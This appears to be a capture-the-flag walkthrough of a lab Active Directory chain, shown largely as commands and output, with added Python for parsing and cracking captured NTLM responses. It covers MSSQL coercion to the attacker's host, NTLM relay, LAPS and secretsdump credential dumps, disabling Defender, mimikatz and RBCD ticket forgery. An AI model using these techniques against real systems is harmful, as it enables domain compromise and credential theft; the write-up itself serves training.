vulnlab-reflection
Reflection is a medium Active Directory chain of three machines: MS01, WS01 and DC01. A readable staging share on MS01 leaks MSSQL credentials for the staging database. From that MSSQL session, xp_dirtree makes the SQL Server service account (svc_web_staging) authenticate to our host, and relaying that NTLM authentication to DC01's SMB service (which does not require signing) gives access to the prod share, which contains the production database credentials. The production database on DC01 holds two domain passwords, abbie.smith and dorothy.rose. abbie.smith has GenericAll over MS01, which includes reading its LAPS password; as local Administrator on MS01 we dump Georgia.Price's password from the credential vault. Georgia.Price has GenericAll over WS01, and since MachineAccountQuota is 0 we use the machine account we already control, MS01$, for Resource-Based Constrained Delegation (RBCD) against WS01 and obtain a SYSTEM ticket there. Dumping WS01 yields Rhys.Garner's cleartext password, which is reused by DOM_RGARNER, a member of Domain Admins.
Writeup:
Guest access to SMB on MS01 works with any username and an empty password, and it exposes a readable staging share holding a database config file:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares
SMB  ms01.reflection.vl  445  MS01  [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB  ms01.reflection.vl  445  MS01  [+] reflection.vl\puck:
SMB  ms01.reflection.vl  445  MS01  [+] Enumerated shares
SMB  ms01.reflection.vl  445  MS01  Share     Permissions   Remark
SMB  ms01.reflection.vl  445  MS01  -----     -----------   ------
SMB  ms01.reflection.vl  445  MS01  ADMIN$                  Remote Admin
SMB  ms01.reflection.vl  445  MS01  C$                      Default share
SMB  ms01.reflection.vl  445  MS01  IPC$      READ          Remote IPC
SMB  ms01.reflection.vl  445  MS01  staging   READ          staging environment

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

                6261245 blocks of size 4096. 1153753 blocks available
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf
user=web_staging
password=Washroom510
db=staging
mssql enum

The staging credentials are a SQL login on the SQLEXPRESS instance of MS01. web_staging is only guest in master but dbo in the staging database, whose single table holds two developer passwords:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName   UserID   SID
------------------   --------   ---------   ---------   -------------   ------   -----
dbo                  db_owner   sa          master      dbo             b'1 '    b'01'
guest                public     NULL        NULL        guest           b'2 '    b'00'
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3 '    NULL
sys                  public     NULL        NULL        NULL            b'4 '    NULL
SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on
-------   -----------------
master    0
tempdb    0
model     0
msdb      1
staging   0
SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE
-------------   ------------   ----------   ----------
staging         dbo            users        b'BASE TABLE'
SQL (web_staging  dbo@staging)> select * from users;
id   username   password
--   --------   -------------
 1   b'dev01'   b'Initial123'
 2   b'dev02'   b'Initial123'

xp_dirtree is callable by any login and lists a UNC path as the SQL Server service account, so pointing it at our own host (10.8.2.138) makes that account authenticate to us over SMB. With impacket-smbserver listening:

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file
------------   -----   ----
SQL (web_staging  dbo@staging)>
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

The captured NetNTLMv2 response does not crack with rockyou:

john svc_web_staging.hash --wordlist=/usr/share/wordlists/rockyou.txt -> uncrackable
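What john is actually computing against that line, and what the capture itself reveals, as an added example (my code, not part of the original writeup and not Impacket's): the hashcat-style line is parsed, the blob is decoded (its FILETIME dates the capture, its AV pairs name the SPN the client believed it was talking to, here the SMB listener's IP, and its channel-binding field), and a password guess is verified by recomputing NTProofStr. The svc_web_staging line is copied from the output above; the demo password, client challenge and `demo.user` name used for the self-check are constructed. MD4 is implemented inline because many OpenSSL 3 builds remove it from hashlib.

```python
"""NetNTLMv2: parse a captured hashcat-style line, decode its blob, verify a password guess.

Added example for this writeup (not from the original post, not Impacket's code). It does the
arithmetic john/hashcat run per candidate against the svc_web_staging capture above:
    NT      = MD4(UTF-16LE(password))
    NTLMv2  = HMAC-MD5(NT, UTF-16LE(upper(user) + domain))
    NTProof = HMAC-MD5(NTLMv2, server_challenge || blob)
"""
import hashlib
import hmac
import struct
from datetime import datetime, timedelta, timezone

MASK32 = 0xFFFFFFFF

# Line printed by impacket-smbserver above (data from the writeup; the challenge is Impacket's fixed one).
CAPTURE = "svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000"

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (pure Python, since OpenSSL 3 builds often drop it from hashlib)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    ntlmv2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntlmv2, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str) -> dict:
    """user::DOMAIN:server_challenge:NTProofStr:blob, the format smbserver/Responder print."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def decode_blob(blob: bytes) -> dict:
    """NTLMv2_CLIENT_CHALLENGE: 28-byte fixed part, then AV_PAIRs terminated by MsvAvEOL (id 0)."""
    ticks = struct.unpack_from("<Q", blob, 8)[0]  # FILETIME: 100 ns units since 1601-01-01 UTC
    info = {"timestamp": datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10),
            "client_challenge": blob[16:24], "av": {}}
    pos = 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        value = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:
            return info
        info["av"][AV_NAMES.get(av_id, av_id)] = value.decode("utf-16le") if av_id in (1, 2, 3, 4, 5, 9) else value
    raise ValueError("blob has no MsvAvEOL terminator")


def verify_capture(line: str, password: str) -> bool:
    """True when password reproduces the NTProofStr; this is the per-candidate test john/hashcat run."""
    c = parse_capture(line)
    return hmac.compare_digest(nt_proof(password, c["user"], c["domain"], c["challenge"], c["blob"]), c["proof"])


def crack(line: str, wordlist):
    return next((pw for pw in wordlist if verify_capture(line, pw)), None)


def forge_capture(password, user, domain, server_challenge, blob) -> str:
    """Build a capture line for a known password (used below to self-check the arithmetic)."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed self-check: the real blob, but a user name, challenge and password chosen here.
DEMO_LINE = forge_capture("Initial123", "demo.user", "REFLECTION", bytes.fromhex("1122334455667788"),
                          parse_capture(CAPTURE)["blob"])

if __name__ == "__main__":
    info = decode_blob(parse_capture(CAPTURE)["blob"])
    print(info["timestamp"], info["av"]["TargetName"], info["av"].get("ChannelBindings", b"").hex())
    print(crack(DEMO_LINE, ["Washroom510", "Initial123"]))
    # svc_web_staging's cleartext appears later in the LSA secrets; this checks it against the capture
    print(verify_capture(CAPTURE, "DivinelyPacifism98"))
```

Two things the decoded blob shows that matter for the relay that follows: MsvAvTargetName is `cifs/10.8.2.138`, the listener the victim connected to, which is exactly what service binding (EPA) would compare against the relay target; and MsvAvChannelBindings is all zeros here, meaning the authentication is not bound to any TLS channel. Neither check stops a relay to SMB, only signing does. The timestamp comes from the server's CHALLENGE (Impacket fills it with the current time), so it dates the capture.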
Since the hash does not crack, relay the authentication instead. DC01 does not require SMB signing (signing:False in the crackmapexec output further down), so ntlmrelayx can forward svc_web_staging's SMB authentication straight to DC01's SMB service. -i opens an interactive SMB client on a local port instead of trying to dump secrets:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
We trigger the coercion again from the SQL shell:

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file
------------   -----   ----
SQL (web_staging  dbo@staging)>

and in another terminal on the Kali box connect to the SMB client shell ntlmrelayx opened. The relayed svc_web_staging session can read the prod share on DC01:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
#

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf
user=web_prod
password=Tr<redacted>01
db=prod
DC01 runs its own SQLEXPRESS instance; the production credentials are a SQL login there (tried with a short list of names and SQL authentication):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL  dc01.reflection.vl  1433  DC01  [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL  dc01.reflection.vl  1433  DC01  [+] web_prod:Tr<redacted>01
MSSQL  dc01.reflection.vl  1433  DC01  [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL  dc01.reflection.vl  1433  DC01  [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL  dc01.reflection.vl  1433  DC01  [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL  dc01.reflection.vl  1433  DC01  [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.
sqsh to dc01.reflection.vl

The prod database's users table holds two cleartext passwords that turn out to be domain credentials:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id: 1
name: abbie.smith
password: CM<redacted>Ew

id: 2
name: dorothy.rose
password: hC<redacted>SJ

(2 rows affected)
ldap search

With a domain credential, collect every sAMAccountName for the sprays that follow:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.
bloodhound
bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp
check machine quota

MachineAccountQuota is 0, so we cannot create a computer account of our own; any delegation attack later has to use a machine account we already control.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB   dc01.reflection.vl  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP  dc01.reflection.vl  389  DC01  [+] reflection.vl\dorothy.rose:hC<redacted>SJ
MAQ   dc01.reflection.vl  389  DC01  [*] Getting the MachineAccountQuota
MAQ   dc01.reflection.vl  389  DC01  MachineAccountQuota: 0
check LAPS

abbie.smith's GenericAll over MS01 includes reading ms-Mcs-AdmPwd, so the LAPS module returns MS01's local Administrator password:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps
SMB   DC01  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP  DC01  389  DC01  [+] reflection.vl\abbie.smith:CM<redacted>Ew
LAPS  DC01  389  DC01  [*] Getting LAPS Passwords
LAPS  DC01  389  DC01  Computer: MS01$ Password: H44<redacted>}xi
check which local users accept the LAPS password

Note that the host answering here identifies itself as MS01 (name:MS01, domain:MS01), which is the machine the LAPS password belongs to. Only the Administrator line carries (Pwn3d!); the other [+] lines without it are guest fallbacks for accounts that do not exist locally, not valid logons:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H44<redacted>}xi" --continue-on-success --local-auth
SMB  ws01.reflection.vl  445  MS01  [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB  ws01.reflection.vl  445  MS01  [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB  ws01.reflection.vl  445  MS01  [-] MS01\Guest:H4<redacted>xi STATUS_LOGON_FAILURE
SMB  ws01.reflection.vl  445  MS01  [-] MS01\labadm:H4<redacted>xi STATUS_LOGON_FAILURE
SMB  ws01.reflection.vl  445  MS01  [+] MS01\DC01$:H4<redacted>xi
SMB  ws01.reflection.vl  445  MS01  [+] MS01\krbtgt:H4<redacted>xi
SMB  ws01.reflection.vl  445  MS01  [+] MS01\MS01$:H4<redacted>xi
SMB  ws01.reflection.vl  445  MS01  [+] MS01\WS01$:H4<redacted>xi
Do a secretsdump

The dump is of MS01 (the $MACHINE.ACC secret is MS01$). Two things stand out: the cached logons show that Georgia.Price has logged on to this host, and the service secret _SC_MSSQL$SQLEXPRESS gives the cleartext password of svc_web_staging, the account whose hash did not crack earlier.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb...".. 
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up...
[*] Stopping service RemoteRegistry
We use the local Administrator account to RDP to MS01 and start enumerating it:

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx
On MS01 we disable Defender, upload mimikatz.exe and dump the credential vault, which holds Georgia.Price's password (consistent with her cached logon seen in the secretsdump):

Georgia.Price : DBl<redacted>id
RBCD attack on ws01.reflection.vl (via MS01)

Georgia.Price has GenericAll over WS01, so she can write msDS-AllowedToActOnBehalfOfOtherIdentity on the WS01$ computer object. With MachineAccountQuota at 0 we cannot add a computer account of our own as the delegating principal, but we control MS01 and therefore its machine account, so MS01$ becomes the account allowed to delegate to WS01$. First dump MS01 again to get the current MS01$ NT hash (the machine account password has rotated since the earlier dump, so the hash differs):
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb...".. 
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up...
Check whether the attribute on WS01$ is already populated:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

It is empty, so write a descriptor that allows MS01$ to act on behalf of other identities on WS01$ (the DC IP changed between sessions):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

Now request a service ticket for cifs/WS01.reflection.vl as Administrator (S4U2Self followed by S4U2Proxy), authenticating as MS01$ with its current NT hash, and point the Kerberos tools at the resulting ccache:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache
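What the rbcd read and write steps above actually manipulate, as an added example (my code, not part of the original writeup and not Impacket's): msDS-AllowedToActOnBehalfOfOtherIdentity holds a self-relative security descriptor, and S4U2Proxy is granted to every principal with an allow-ACE in its DACL. The builder reproduces the value impacket-rbcd writes (one ACCESS_ALLOWED_ACE with mask 0xF01FF per delegate-from SID, owner and group BUILTIN\Administrators; the byte layout follows MS-DTYP), and the reader does what the read action does. The MS01$ SID is the one printed above; the ldap3 call in the comment is an assumed usage, not something run here.

```python
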